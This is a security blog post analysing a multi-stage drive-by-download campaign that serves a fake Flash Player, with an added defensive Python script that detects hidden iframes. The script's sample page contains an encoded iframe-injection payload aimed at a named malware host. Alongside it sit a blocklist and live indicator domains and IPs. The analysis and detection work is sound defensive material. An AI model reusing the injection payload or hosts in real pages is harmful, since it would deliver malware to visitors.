In this sense, the Internet has become the cradle of a range of malicious attack techniques that evolve daily. Several years ago it was hard to imagine that merely visiting a page could infect a system, provided certain conditions were met, mainly the state of operating system and application updates.
Today we find scripts whose instructions are crafted maliciously and form part of a cycle of propagation and infection that is, unfortunately, very effective. A concrete example of both evolution and effectiveness is the Drive-by-Download technique together with its evolved form, the Multi-Stage attack, widely used by botmasters to propagate threats.
The following is a real scenario that illustrates the above more clearly. It is a site hosted in the USA at IP 66.116.197.186 in AS32392. A screenshot of the website is shown below.
The domains hosted on that IP are:
- phonester.biz
- phonester.com
- phonester.info
- phonester.net
- phonester.org
This automated process is carried out, as I said, by a script, a capture of which is shown below. The problem is that, to the user, the page carries no indication of malicious content; in fact, it contains no links, only an image.
However, the script runs transparently and prompts the user to download a fake Flash Player. And the matter doesn't end there. From a more technical standpoint there are many details that aren't hard to uncover.
To begin with, deobfuscating the script yields a series of relevant data. The script contains iframe tags that point to a range of websites from which other malicious files are downloaded:
- diggstatistics.com/flash/pdf.php
- diggstatistics.com/flash/directshow.php
- diggstatistics.com/flash/exe.php
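The post describes the classic drive-by pattern: an innocuous-looking page, a script that decodes itself at runtime, and hidden iframes that fetch the next stage. The following Python is an added example written for this page (not the author's script, and not the malicious code itself): it decodes one layer of percent-escaped strings inside `<script>` blocks, lists every iframe found in the raw and decoded HTML, and flags those that are zero-sized or hidden or point at one of the hosts named in this post. The sample page, the `partner.example` host and all function names are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Hosts named in the post as second-stage download locations.
KNOWN_BAD_HOSTS = {
    "diggstatistics.com",
    "digital-plr.com",
    "giggstatistics.com",
    "xebrasearch.com",
}

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*["']?([^"'\s>]+)["']?""")
STRING_RE = re.compile(r"""["']([^"']*)["']""")


def decode_script_layer(script):
    """Return the percent-decoded content of every quoted string in a script
    body that contains %XX escapes (the unescape()-style obfuscation the
    post refers to). Only one layer is decoded; nested layers would need a
    loop, which is deliberately left out here."""
    decoded = []
    for m in STRING_RE.finditer(script):
        s = m.group(1)
        if "%" in s:
            decoded.append(unquote(s))
    return "\n".join(decoded)


def _host_of(src):
    """Extract the hostname from an iframe src, tolerating scheme-less URLs."""
    if src.startswith("//"):
        src = "http:" + src
    elif "://" not in src:
        src = "http://" + src
    return urlparse(src).hostname or ""


def find_iframes(html):
    """Describe every iframe in the page, including ones that only appear
    after decoding escaped strings inside <script> blocks."""
    chunks = [html]
    for m in SCRIPT_RE.finditer(html):
        layer = decode_script_layer(m.group(1))
        if layer:
            chunks.append(layer)

    found = []
    for chunk in chunks:
        for im in IFRAME_RE.finditer(chunk):
            raw_attrs = im.group(1)
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(raw_attrs)}
            src = attrs.get("src", "")
            host = _host_of(src)
            # Zero/one-pixel frames and display:none are the usual ways a
            # drive-by keeps the loader invisible to the visitor.
            hidden = (
                attrs.get("width") in ("0", "1")
                or attrs.get("height") in ("0", "1")
                or "display:none" in raw_attrs.replace(" ", "").lower()
            )
            found.append({
                "src": src,
                "host": host,
                "hidden": hidden,
                "known_bad": host in KNOWN_BAD_HOSTS,
                "from_script": chunk is not html,
            })
    return found


def suspicious_iframes(iframes):
    """Filter to the frames a defender should look at first."""
    return [f for f in iframes if f["hidden"] or f["known_bad"]]


# Constructed sample page: one visible image, a self-decoding script that
# writes a zero-sized iframe, and one ordinary visible iframe for contrast.
SAMPLE_PAGE = (
    '<html><body><img src="logo.jpg">\n'
    '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F'
    'diggstatistics.com%2Fflash%2Fpdf.php%22%20width%3D0%20height%3D0%3E'
    '%3C%2Fiframe%3E"));</script>\n'
    '<iframe src="http://partner.example/ad.html" width="300" height="250">'
    '</iframe>\n'
    '</body></html>'
)

if __name__ == "__main__":
    for frame in suspicious_iframes(find_iframes(SAMPLE_PAGE)):
        print(frame)
```

Run as a script it prints only the hidden `diggstatistics.com` frame; the visible advertising frame passes. In practice the same function would be pointed at a fetched page or a proxy capture, and the `KNOWN_BAD_HOSTS` set would be fed from a blocklist rather than hard-coded.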
Moreover, should the file downloaded in the first stage (install_flash_player.exe) be executed, it connects to 174.120.61.126/~garynic/, from where it downloads the binary "coin.exe" (258c0083f051b88ea36d3210eca18dd7), which also has quite a poor detection rate. This file is downloaded at random from:
- digital-plr.com
- giggstatistics.com
- xebrasearch.com
In other words, these activities are operated together, not in isolation. This information suggests that behind all these criminal activities lies the greed of some botmaster, since the actions are typical of a botnet.
Related information
- Malware propagation (...) with blogging format and BlackHat SEO
- Symbiosis of current malware. Koobface
- Scareware. In-the-Wild malware repository
- Massive malware propagation (...) entertainment sites
- Schematic analysis of a web-based malware attack
Jorge Mieres
1 comment:
As always - highly informative. Thank you for fighting the good fight.
Cheers
/Bev